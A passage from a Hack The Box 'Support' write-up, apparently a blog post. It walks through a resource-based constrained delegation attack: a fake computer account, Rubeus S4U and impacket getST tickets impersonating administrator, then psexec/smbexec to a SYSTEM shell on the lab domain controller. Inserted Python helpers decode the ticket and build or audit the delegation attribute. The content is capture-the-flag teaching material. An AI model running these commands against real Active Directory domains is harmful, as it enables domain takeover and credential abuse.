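            key, start = sddl[i - 1], i + 1
    if key is not None:
        sections[key] = sddl[start:]
    return sections


def rights_to_mask(rights):
    """Convert a rights field ('CCDCLC...' or hex '0x...') to an access mask."""
    rights = rights.strip()
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    if len(rights) % 2:
        raise ValueError("odd-length rights string: %r" % rights)
    mask = 0
    for i in range(0, len(rights), 2):
        token = rights[i:i + 2]
        if token not in SDDL_RIGHTS:
            raise ValueError("unknown SDDL right %r" % token)
        mask |= SDDL_RIGHTS[token]
    return mask


def parse_dacl(sddl):
    """Return the DACL's ACEs as dicts with type, flags, mask and sid."""
    dacl = split_sections(sddl).get("D", "")
    return [
        {"type": t, "flags": f, "mask": rights_to_mask(r), "sid": sid}
        for t, f, r, _obj, _inh, sid in ACE_RE.findall(dacl)
    ]


def audit_rbcd(sddl, approved_sids):
    """List every principal allowed to act on behalf of the computer.

    An empty attribute means no RBCD is configured. Each finding carries the
    SID, its access mask and whether the SID is on the defender's allowlist;
    an unapproved SID means someone has written this attribute.
    """
    if not sddl:
        return []
    return [
        {"sid": a["sid"], "mask": a["mask"], "approved": a["sid"] in approved_sids}
        for a in parse_dacl(sddl)
        if a["type"] == "A"  # only access-allowed ACEs grant delegation
    ]


if __name__ == "__main__":
    for finding in audit_rbcd(SAMPLE_SDDL, approved_sids=set()):
        print("%s mask=0x%X approved=%s" % (finding["sid"], finding["mask"], finding["approved"]))
```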

30. There is an ACL whose SecurityIdentifier is my fake computer, marked AccessAllowed. To authenticate as the fake computer, I will use Rubeus to get the hash of the fake computer account:

*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe hash /password:0xdf0xdf123 /user:0xdfFakeComputer /domain:support.htb

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.4


[*] Action: Calculate Password Hash(es)

[*] Input password : 0xdf0xdf123
[*] Input username : 0xdfFakeComputer
[*] Input domain : support.htb
[*] Salt : SUPPORT.HTB0xdffakecomputer
[*] rc4_hmac : B1809AB221A7E1F4545BD9E24E49D5F4
[*] aes128_cts_hmac_sha1 : F7A01B9628299B9FB8A93CFCCF8E747C
[*] aes256_cts_hmac_sha1 : 90499A3696F8B07B9CDB02E919F193768519340F7812F6050177E6997262B6F0
[*] des_cbc_md5 : 76EF4F97ADD99176

*Evil-WinRM* PS C:\Users\support\Desktop>

31. I need the one labelled rc4_hmac; I pass it to Rubeus to get a ticket as administrator:

*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe s4u /user:0xdfFakeComputer$ /rc4:B1809AB221A7E1F4545BD9E24E49D5F4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.4

[*] Action: S4U

[*] Using rc4_hmac hash: B1809AB221A7E1F4545BD9E24E49D5F4
[*] Building AS-REQ (w/ preauth) for: 'support.htb\0xdfFakeComputer$'
[+] TGT request successful!
[*] base64(ticket.kirbi):


[*] Action: S4U

[*] Using domain controller: dc.support.htb (::1)
[*] Building S4U2self request for: '0xdfFakeComputer$@SUPPORT.HTB'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'administrator' to '0xdfFakeComputer$@SUPPORT.HTB'
[*] base64(ticket.kirbi):


[*] Impersonating user 'administrator' to target SPN 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':

[+] Ticket successfully imported!
*Evil-WinRM* PS C:\Users\support\Desktop>

32. Check the ticket state

*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe klist

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.4


Action: List Kerberos Tickets (Current User)

[*] Current LUID : 0x228020

UserName : support
Domain : SUPPORT
LogonId : 0x228020
UserSID : S-1-5-21-1677581083-3380853377-188903654-1105
AuthenticationPackage : NTLM
LogonType : Network
LogonTime : 3/20/2024 8:10:46 PM
LogonServer : DC
LogonServerDNSDomain : support.htb
UserPrincipalName : support@support.htb

[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 3/20/2024 8:23:25 PM ; 3/21/2024 6:23:25 AM ; 3/27/2024 8:23:25 PM
Server Name : cifs/dc.support.htb @ SUPPORT.HTB
Client Name : administrator @ SUPPORT.HTB
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)

*Evil-WinRM* PS C:\Users\support\Desktop>

33. To use it remotely, I'll take the last ticket Rubeus produced, copy it back to my machine and save it as ticket.kirbi.b64, making sure all whitespace is removed. Then I base64-decode it to ticket.kirbi:

┌──(kali㉿offsec)-[~/Desktop]
└─$ base64 -d ticket.kirbi.b64 > ticket.kirbi

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.11.0 - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done
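Before converting or importing a ticket it is worth confirming what it actually contains. The script below is an added example, not code from the writeup or from Rubeus/Impacket: it decodes the base64 KRB-CRED that Rubeus printed above with a minimal DER walker built on the Python standard library. A kirbi file is a KRB-CRED whose EncKrbCredPart is stored with etype 0, i.e. unencrypted, so the client name, service name, flags, validity and encryption types are readable without any key; only the Ticket's own enc-part (encrypted to the DC$ AES256 key) stays opaque.

```python
import base64

# The S4U2proxy ticket Rubeus printed above (base64 KRB-CRED, the kirbi format).
KIRBI_B64 = """
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
"""


def der_tlv(buf: bytes, off: int):
    """Decode one DER TLV at off -> (tag, value_start, value_end, next_off).
    Kerberos ASN.1 only uses single-byte tags (tag numbers < 31)."""
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:                       # long form: 0x8N followed by N length bytes
        n = length & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, off, off + length, off + length


def children(buf: bytes, start: int, end: int):
    """Yield (tag, value_start, value_end) for each TLV between start and end."""
    off = start
    while off < end:
        tag, vs, ve, off = der_tlv(buf, off)
        yield tag, vs, ve


def descend(buf: bytes, path, start: int = 0, end=None):
    """Follow a list of tags, taking the first child carrying each tag in turn; return the value span."""
    end = len(buf) if end is None else end
    for want in path:
        for tag, vs, ve in children(buf, start, end):
            if tag == want:
                start, end = vs, ve
                break
        else:
            raise ValueError("tag 0x%02x not found" % want)
    return start, end


def principal_name(buf: bytes, start: int, end: int) -> str:
    """PrincipalName ::= SEQUENCE { name-type [0] INTEGER, name-string [1] SEQUENCE OF GeneralString }"""
    s, e = descend(buf, [0x30, 0xA1, 0x30], start, end)
    return "/".join(buf[vs:ve].decode("ascii") for tag, vs, ve in children(buf, s, e) if tag == 0x1B)


def kirbi_summary(b64: str) -> dict:
    buf = base64.b64decode("".join(b64.split()))
    if buf[0] != 0x76:                      # [APPLICATION 22] = KRB-CRED
        raise ValueError("not a KRB-CRED")
    # Ticket ::= [APPLICATION 1] { tkt-vno [0], realm [1], sname [2],
    #                              enc-part [3] EncryptedData { etype [0], kvno [1], cipher [2] } }
    ticket = descend(buf, [0x76, 0x30, 0xA2, 0x30, 0x61, 0x30])
    tkt = {tag: (vs, ve) for tag, vs, ve in children(buf, *ticket)}
    ts, te = descend(buf, [0x30, 0xA0, 0x02], *tkt[0xA3])
    # The EncKrbCredPart ([APPLICATION 29], carried in enc-part [3] with etype 0) is not encrypted, so
    # KrbCredInfo { key [0], prealm [1], pname [2], flags [3], ..., endtime [6], srealm [8], sname [9] } is readable.
    info = descend(buf, [0x76, 0x30, 0xA3, 0x30, 0xA2, 0x04, 0x7D, 0x30, 0xA0, 0x30, 0x30])
    fld = {tag: (vs, ve) for tag, vs, ve in children(buf, *info)}
    text = lambda tag, inner: buf[slice(*descend(buf, [inner], *fld[tag]))].decode("ascii")
    fs, fe = descend(buf, [0x03], *fld[0xA3])          # BIT STRING: first byte is the unused-bit count
    ks, ke = descend(buf, [0x30, 0xA0, 0x02], *fld[0xA0])
    return {
        "ticket_etype": int.from_bytes(buf[ts:te], "big"),       # 18 = aes256_cts_hmac_sha1
        "session_key_etype": int.from_bytes(buf[ks:ke], "big"),  # 17 = aes128_cts_hmac_sha1
        "client": principal_name(buf, *fld[0xA2]),
        "client_realm": text(0xA1, 0x1B),
        "service": principal_name(buf, *fld[0xA9]),
        "service_realm": text(0xA8, 0x1B),
        "endtime": text(0xA6, 0x18),                             # GeneralizedTime, UTC
        "flags": buf[fs + 1:fe].hex(),
    }


if __name__ == "__main__":
    for key, value in kirbi_summary(KIRBI_B64).items():
        print("%-18s %s" % (key, value))
```

Run as-is it prints the same fields Rubeus klist showed on the box (client administrator, service cifs/dc.support.htb, flags 40a50000, ticket etype 0x12). Because the cred part is plaintext, anyone holding the kirbi or the converted ccache can use it until endtime, so both files should be removed from the target and from the attacking host once this step is done.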

34. I can use it with psexec.py to get a shell:

┌──(kali㉿offsec)-[~/Desktop]
└─$ KRB5CCNAME=ticket.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file OfkknBGb.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service DCRe on dc.support.htb.....
[*] Starting service DCRe.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 955A-5CBB

Directory of C:\Users\Administrator\Desktop

05/28/2022 04:17 AM <DIR> .
05/28/2022 04:11 AM <DIR> ..
03/20/2024 06:29 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,972,321,280 bytes free

C:\Users\Administrator\Desktop>

35. Grab the final flag

C:\Users\Administrator\Desktop> type root.txt
99ed202f462e3da8e669eaee03d6e250

C:\Users\Administrator\Desktop>

Appendix: alternative method

Continuing with the plan, we upload Powermad to the target with evil-winrm. The commands below add a fake computer account to AD, then write that account into the DC's PrincipalsAllowedToDelegateToAccount (the msDS-AllowedToActOnBehalfOfOtherIdentity attribute, i.e. resource-based constrained delegation configured on the DC object, not a delegation setting on the fake computer itself), and finally derive the Kerberos keys for the new account's password.

*Evil-WinRM* PS C:\Users\support\Desktop> 
*Evil-WinRM* PS C:\Users\support\Desktop> Set-Variable -Name "FakePC" -Value "FAKE01"
*Evil-WinRM* PS C:\Users\support\Desktop> Set-Variable -Name "targetComputer" -Value "DC"
*Evil-WinRM* PS C:\Users\support\Desktop> New-MachineAccount -MachineAccount (Get-Variable -Name "FakePC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Verbose: [+] Domain Controller = dc.support.htb
Verbose: [+] Domain = support.htb
Verbose: [+] SAMAccountName = FAKE01$
Verbose: [+] Distinguished Name = CN=FAKE01,CN=Computers,DC=support,DC=htb
[+] Machine account FAKE01 added
*Evil-WinRM* PS C:\Users\support\Desktop> Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakePC").Value + '$')
*Evil-WinRM* PS C:\Users\support\Desktop> Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount


DistinguishedName : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName : dc.support.htb
Enabled : True
Name : DC
ObjectClass : computer
ObjectGUID : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=FAKE01,CN=Computers,DC=support,DC=htb}
SamAccountName : DC$
SID : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName :



*Evil-WinRM* PS C:\Users\support\Desktop>


Once New-MachineAccount has created the fake computer object, the remaining steps use the built-in ActiveDirectory module. Set-ADComputer ... -PrincipalsAllowedToDelegateToAccount writes a security descriptor into the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, granting FAKE01$ the right to obtain service tickets to DC on behalf of other users; this needs write access to the DC computer object, which the support account evidently has since the command succeeds. The Get-ADComputer call verifies that CN=FAKE01 is now listed. Creating the computer account itself works because ms-DS-MachineAccountQuota defaults to 10 in Windows, so any authenticated user may join up to ten machines. The quota can be checked with PowerView (Get-DomainObject comes from PowerView.ps1, not Powermad, which is why the first attempt below fails until PowerView is imported):


Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota


*Evil-WinRM* PS C:\Users\support\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> Import-Module ./Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota
The term 'Get-DomainObject' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machine ...
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Get-DomainObject:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\support\Desktop>

Warning: Press "y" to exit, press any other key to continue
*Evil-WinRM* PS C:\Users\support\Desktop> Import-Module ./PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota

ms-ds-machineaccountquota
-------------------------
10


*Evil-WinRM* PS C:\Users\support\Desktop>
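What Set-ADComputer -PrincipalsAllowedToDelegateToAccount actually stores is a binary, self-relative security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity whose DACL holds one ACCESS_ALLOWED_ACE per permitted principal. The following added example (not from the writeup, Powermad or the AD module) builds that descriptor the way impacket's rbcd.py does and parses it back, so a raw attribute value pulled with ldapsearch can be read without Windows tooling. The SID used for FAKE01$ is an assumption: the domain part is the one shown in the Get-ADComputer output above, the RID 1110 is made up.

```python
import struct

# Access mask that impacket's rbcd.py and PowerView's SDDL "CCDCLCSWRPWPDTLOCRSDRCWDWO" put in the ACE.
RBCD_ACE_MASK = 0x000F01FF
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION = 2
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
BUILTIN_ADMINS = "S-1-5-32-544"      # owner and group of the descriptor


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-a-b-c-rid' -> binary SID: rev(1) count(1) authority(6, big-endian) subauths(4 each, LE)."""
    parts = sid.split("-")
    if parts[0].upper() != "S" or len(parts) < 3:
        raise ValueError("bad SID: %r" % sid)
    rev, auth, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return struct.pack("<BB", rev, len(subs)) + auth.to_bytes(6, "big") + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(buf: bytes, off: int = 0) -> tuple:
    """Inverse of sid_to_bytes; returns (sid string, bytes consumed)."""
    rev, count = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, auth, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_sd(allowed_sids: list) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR whose DACL holds one ACCESS_ALLOWED_ACE per SID.
    This is the value written into msDS-AllowedToActOnBehalfOfOtherIdentity."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE_HEADER: type(1) flags(1) size(2), then the access mask(4), then the SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), RBCD_ACE_MASK) + sid_b
    # ACL: revision(1) sbz1(1) size(2) ace_count(2) sbz2(2)
    dacl = struct.pack("<BBHHH", ACL_REVISION, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    owner_off = 20                                  # header size
    group_off = owner_off + len(owner)
    dacl_off = group_off + len(owner)
    # SECURITY_DESCRIPTOR: revision(1) sbz1(1) control(2) owner/group/sacl/dacl offsets(4 each); sacl absent
    hdr = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, owner_off, group_off, 0, dacl_off)
    return hdr + owner + owner + dacl


def parse_rbcd_sd(sd: bytes) -> list:
    """Return [(sid, access_mask)] for every ACCESS_ALLOWED_ACE in the DACL, i.e. the principals
    allowed to delegate to the object. Works directly on the raw LDAP attribute value."""
    if len(sd) < 20:
        return []
    _rev, _sbz, control, _o_owner, _o_group, _o_sacl, o_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or o_dacl == 0:
        return []
    _acl_rev, _sbz1, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, o_dacl)
    off, out = o_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            mask, = struct.unpack_from("<I", sd, off + 4)
            sid, _ = bytes_to_sid(sd, off + 8)
            out.append((sid, mask))
        off += ace_size                              # skip unknown ACE types by their declared size
    return out


# Domain SID from the writeup (DC$ is RID 1000, support is RID 1105). FAKE01$'s RID 1110 is an
# assumption for this example; read the real one with: Get-ADComputer FAKE01 | select SID
FAKE01_SID = "S-1-5-21-1677581083-3380853377-188903654-1110"

if __name__ == "__main__":
    sd = build_rbcd_sd([FAKE01_SID])
    print(len(sd), "bytes:", sd.hex())
    print(parse_rbcd_sd(sd))
```

parse_rbcd_sd over the value read back from every domain controller object lists who may delegate to it, which is the check a defender wants; an unexpected, recently created computer account there is exactly this attack. Clearing the attribute afterwards (Set-ADComputer DC -PrincipalsAllowedToDelegateToAccount $null) removes the foothold.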


Next we use Rubeus to derive the Kerberos keys of the newly created computer account from its password. With the password set to 123456, we upload Rubeus.exe to the target and run the command below. The rc4_hmac value is simply the NT hash of the password (MD4 over UTF-16LE, no salt), whereas the AES keys are salted with the realm and host name, which is why /user and /domain must be passed. Either the AES256 key or the NT hash can then drive the S4U request from Kali and obtain a ticket on behalf of administrator.

.\Rubeus.exe hash /password:123456 /user:FAKE01$ /domain:support.htb


*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe hash /password:123456 /user:FAKE01$ /domain:support.htb

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.4


[*] Action: Calculate Password Hash(es)

[*] Input password : 123456
[*] Input username : FAKE01$
[*] Input domain : support.htb
[*] Salt : SUPPORT.HTBhostfake01.support.htb
[*] rc4_hmac : 32ED87BDB5FDC5E9CBA88547376818D4
[*] aes128_cts_hmac_sha1 : 4799D0F80833802EE7F1412BD30DCD5C
[*] aes256_cts_hmac_sha1 : 35CE465C01BC1577DE3410452165E5244779C17B64E6D89459C1EC3C8DAA362B
[*] des_cbc_md5 : 836D4C85A4F23B62

*Evil-WinRM* PS C:\Users\support\Desktop>


With the delegation misconfigured so that FAKE01$ may act on behalf of other users towards DC, the next step is to request a service ticket rather than a TGT: getST first obtains a TGT for FAKE01$ with the key derived above, then performs S4U2self and S4U2proxy to get a ticket for dc.support.htb with administrator as the client. The request is issued from the Kali attack machine. Note that the SPN requested is http/dc.support.htb while the ticket is used for SMB below: the service class in the SPN is not validated by the receiving service, only that the ticket decrypts with the DC$ account key, so any SPN of the DC works (the same trick Rubeus exposes as /altservice).


impacket-getST support.htb/FAKE01 -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 35CE465C01BC1577DE3410452165E5244779C17B64E6D89459C1EC3C8DAA362B

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-getST support.htb/FAKE01 -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 35CE465C01BC1577DE3410452165E5244779C17B64E6D89459C1EC3C8DAA362B
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache


KRB5CCNAME=administrator.ccache impacket-smbexec support.htb/administrator@dc.support.htb -no-pass -k


┌──(kali㉿offsec)-[~/Desktop]
└─$ KRB5CCNAME=administrator.ccache impacket-smbexec support.htb/administrator@dc.support.htb -no-pass -k
Impacket v0.11.0 - Copyright 2023 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd C:/Users/Administrator/Desktop
[-] You can't CD under SMBEXEC. Use full paths.
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
99ed202f462e3da8e669eaee03d6e250

C:\Windows\system32>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/484


Support-htb-writeup
https://sh1yan.top/2024/03/20/Support-htb-writeup/
Author: shiyan
Published: 20 March 2024